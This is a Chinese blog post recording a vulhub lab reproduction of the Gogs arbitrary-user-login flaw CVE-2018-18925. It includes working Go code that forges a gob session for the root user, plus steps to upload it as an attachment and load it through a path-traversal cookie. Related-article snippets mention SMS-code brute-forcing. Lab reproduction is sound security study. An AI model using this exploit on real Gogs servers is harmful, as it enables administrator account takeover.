Gogs 任意用户登录漏洞(CVE-2018-18925)

最新推荐文章于 2024-04-30 16:45:00 发布
最新推荐文章于 2024-04-30 16:45:00 发布
阅读量3.1k 收藏 1
点赞数
分类专栏: vulhub漏洞复现 文章标签: 安全 go
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/117995992
版权

漏洞背景

Gogs(又名Go Git Service)是Gogs团队开发的一个基于Go语言的自助Git托管服务,它支持创建、迁移公开/私有仓库,添加、删除仓库协作者等。 Gogs 0.11.66版本中存在安全漏洞,该漏洞源于程序没有正确验证会话ID。远程攻击者可利用该漏洞执行代码。

漏洞复现

使用Gob序列化生成session文件:

package main

import (
    "bytes"
    "encoding/gob"
    "encoding/hex"
    "fmt"
    "io/ioutil"
    "os"
)

func EncodeGob(obj map[interface{}]interface{}) ([]byte, error) {
    for _, v := range obj {
        gob.Register(v)
    }
    buf := bytes.NewBuffer(nil)
    err := gob.NewEncoder(buf).Encode(obj)
    return buf.Bytes(), err
}

func main() {
    var uid int64 = 1
    obj := map[interface{}]interface{}{"_old_uid": "1", "uid": uid, "uname": "root"}
    data, err := EncodeGob(obj)
    if err != nil {
        fmt.Println(err)
    }
    err = ioutil.WriteFile("data", data, os.O_CREATE|os.O_WRONLY)
    if err != nil {
        fmt.Println(err)
    }
    edata := hex.EncodeToString(data)
    fmt.Println(edata)
}

在这里就已经蒙一半了,网上复现也是少数说明如何操作,我就懒的找了。到这里就只描述一下步骤:

  1. 生成的session是一个文件,注册一个普通用户账户,创建项目,并在“版本发布”页面上传它。
  2. 通过这个附件的URL,得知这个文件的文件名,类似:./attachments/2eb7f1a2-b5ec-482e-a297-15b625d24a10
  3. 然后,构造Cookie:i_like_gogits=../attachments/2/e/2eb7f1a2-b5ec-482e-a297-15b625d24a10,访问即可发现已经成功登录id=1的用户(即管理员root)

详细

请参考以下文章:

小 白 萝 卜
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用Vulnhub复现漏洞 - Gogs 任意用户登录漏洞CVE-2018-18925
JiangBuLiu的博客
07-08 4277
Apache SSI 远程命令执行漏洞Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现 Vulnhub官方复现教程 【https://vulhub.org/#/environments/httpd/ssi-rce/】 漏洞原理 【】 复现漏洞 启动环境 https://blog.csdn.net/JiangBuLiu/article/details/93853056 进入路径为 cd /...
Vulhub靶场Gogs 任意用户登录漏洞复现
X_python321的博客
08-04 1003
复现踩的坑 这篇文章没准能帮你
实战—登录功能引发的逻辑漏洞
最新发布
2301_80115097的博客
04-30 316
声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。经过分析发现,使用的手机号码都是同一个地区的号码。存在该用户名则返回数据包长度 343,如果不存在则返回 457,并且 验证码也在返回包。输入不存在的手机号和身份证,设置好密码,BP抓包把4位数的验证码爆破出来。等,来跑后门的4位数,暴破出有用的手机号码。本来要测下短信轰炸的,额。
如何挖掘任意用户登录漏洞
chengman3837的博客
03-29 687
0x01前言 本文参与i春秋现金奖励计划,未经允许,严禁转载。 0x02什么是任意用户登录漏洞 几乎每个网站都有自己的会员系统,有会员,就有登录机制,如果可以登录其他用户账户,那么就可以窃取其他用户的资料数据。如果配合上脚本的话,甚至可以批量获取用户的数据。对网站...
GITGOGS搭建私有GIT部分问题
JaneYork的博客
03-30 262
搭建部署:https://blog.csdn.net/qq_31708763/article/details/104814669 问题记录: 1.部分用户无法自定义头像,无法多次自定义头像;
学习笔记-B/S - Exploits
热门推荐
人饭子的博客
11-02 2万+
B/S - Exploits 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 大纲 各类论坛/CMS框架 AEM 74CMS dedeCMS Discuz Discuz Discuz!ML Drupal ECshop Fastadmin Laravel jeecg jeewms Joomla Maccms MetIn...
Golang漏洞管理体系以及govulncheck漏洞检测工具介绍
TomCN0803的博客
01-31 1066
govulncheck根据不同的分析目标会有不同的分析策略,例如在分析Go源码文件(*.go)时,会使用当前本地环境变量中默认的Go配置信息;govulncheck是前文提到的Go官方编写的Go项目漏洞检测二进制工具,开发者运行该工具就可以检查Go项目中的漏洞漏洞检测工具govulncheck文档:https://pkg.go.dev/golang.org/x/vuln/cmd/govulncheck。其中govulncheck是一个Go编写的二进制工具,开发者运行该工具就可以检查Go项目中的漏洞
Gogs轻量级git服务-其他
06-12
Gogs功能特性:支持活动时间线支持SSH以及HTTP/HTTPS协议支持SMTP、LDAP和反向代理的用户认证支持反向代理子路径支持用户、组织和仓库管理系统支持添加和删除仓库协作者支持仓库和组织级别Web钩子(包括Slack集成)...
go-gogs-client:Go中的Gogs API客户端
05-24
`go-gogs-client` 是一个用Go语言编写的客户端库,专门用于与Gogs(一个开源的Git服务)API进行交互。Gogs,全称“Go Git Service”,是一个由Go语言开发的轻量级、快速且易于部署的Git服务。这个客户端库为开发者...
ansible-role-gogs:Ansible角色-Gogs:Go Git服务
01-31
- `tasks` 目录:包含一系列任务文件,每个文件定义了要执行的命令或模块,如安装 Gogs 依赖、下载和解压 Gogs 二进制文件、创建运行用户和服务账户、配置 Gogs 配置文件等。 - `handlers` 目录:定义了当某些任务...
go-gogs-cli:Go-gogs-cli是go-gogs-client API CLI。 说快三倍
05-13
Gogs CLI 访问 ,该目前仅可在。 & go软件包处理CLI界面的艰苦工作。 设置。 TLDR:只需确保gogs可执行文件...$ cd $GOPATH /src/irstacks/go-gogs-cli $ go get ./... __Or__,几乎是很棒的`git clone` ...`bash
gogs_v0.9.97_windows_amd64.zip
12-13
解压压缩包。 使用命令 cd 进入到刚刚创建的目录。 执行命令 ./gogs web,然后,运行http://localhost:3000/ 根据要求进行安装。
docs-api:Gogs API v1文档的存储库
02-04
Gogs API v1 文档是开发者与 Gogs 交互的重要参考资源,它提供了一系列的接口,使得用户可以通过编程方式管理 Gogs 实例上的各种操作,如创建仓库、管理用户、控制权限等。Gogs 是一个开源的 Git 服务,设计为轻量级...
挖洞经验之某次任意用户登录漏洞挖掘
weixin_30951389的博客
06-18 770
今天测试时发现一个任意用户登录漏洞,简单记录一下(em...写得真的很简单的那种!) 登录成功后的一个请求,里面包含了当前登录用户的用户名和user_id: 后面紧接着一个包含敏感信息的数据包,如下: 可以看到返回信息中包含了当前用户的密码MD5,且可以正常解密。更换为其他的user_id: 可以看到,返回了其他user_id的密码,但是,正常情况下,只有在成功登录一个用户后才...
gitea 1.4 未授权远程代码执行漏洞复现
锋刃科技的博客
01-04 1284
漏洞概要 Gitea是从gogs衍生出的一个开源项目,是一个类似于Github、Gitlab的多用户Git仓库管理平台。其1.4.0版本中有一处逻辑错误,导致未授权用户可以穿越目录,读写任意文件,最终导致执行任意命令。 影响版本 1.4.0 环境搭建 Vulhub进行搭建 https://github.com/vulhub/vulhub/tree/master/gitea/1.4-rce 进入目录 cd vulhub-master/gitea/1.4-rce...
SSH用户枚举漏洞CVE-2018-15473)原理学习
weixin_30915275的博客
08-24 1353
一、漏洞简介 1、漏洞编号和类型 CVE-2018-15473 SSH 用户名(USERNAME)暴力枚举漏洞 2、漏洞影响范围 OpenSSH 7.7及其以前版本 3、漏洞利用方式 由于SSH本身的认证机制存在缺陷,导致攻击者可以使用字典,暴力枚举SSH存在的用户名(Username) 4、漏洞修复方式 升级openssh 二、漏洞原理及其利用分析 1、漏洞原理 参考国外文献:...
常用的渗透测试辅助工具
IDO老徐软件测试窝
10-08 676
通常的黑客攻击包括预攻击、攻击和后攻击三个阶段;预攻击阶段主要指一些信息收集和漏洞扫描的过程;攻击过程主要是利用第一阶段发现的漏洞或弱口令等脆弱 性进行入侵;后攻击是指在获得攻击目标的一定权限后,对权限的提升、后面安装和痕迹清除等后续工作。与黑客的攻击相比,渗透测试仅仅进行预攻击阶段的工 作,并不对系统本身造成危害,即仅仅通过一些信息搜集手段来探查系统的弱口令、漏洞等脆弱性信息。...
迁移gogs直接拷贝其gogs-repositories导致hook脚本中的相关路径与实际不相符
先拙的博客
06-07 3635
问题直接拷贝gogs-repositories导致项目中的hooks文件下的post-receive pre-receive update三个脚本中的调用路径与实际不符,导致remote: hooks/pre-receive: line 2: <path>: No such file or directory解决办法修改相关路径
go-gob序列化/反序列化与读写文件性能对比测试
weixin_30297281的博客
01-07 532
测试目的:个人开源项目ZCache需对数据进行持久化存储,在此验证两种技术方案:gob序列化/反序列化和直接读写文件的性能 待测试代码 package main import ( gob "encoding/gob" "encoding/json" "fmt" "os" ) type PersonInfo struct { N...
mysql添加gogs用户
07-27
要在MySQL中添加一个名为"gogs"的用户,您可以按照以下步骤进行操作: 1. 打开MySQL命令行客户端或MySQL管理工具。 2. 以具有足够权限的用户身份登录到MySQL。 3. 运行以下命令创建一个新用户并设置密码(请将"your_password"替换为实际的密码): ```sql CREATE USER 'gogs'@'localhost' IDENTIFIED BY 'your_password'; ``` 4. 授予"gogs"用户适当的权限。您可以根据需要调整权限级别,这里我们将授予该用户对名为"gogsdb"的数据库的全部权限: ```sql GRANT ALL PRIVILEGES ON gogsdb.* TO 'gogs'@'localhost'; ``` 5. 最后,刷新MySQL的权限表以使更改生效: ```sql FLUSH PRIVILEGES; ``` 现在,您已经成功在MySQL中创建了一个名为"gogs"的用户,并赋予了适当的权限。请记住在实际应用中使用更安全的密码,并根据需要修改数据库和权限的名称。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值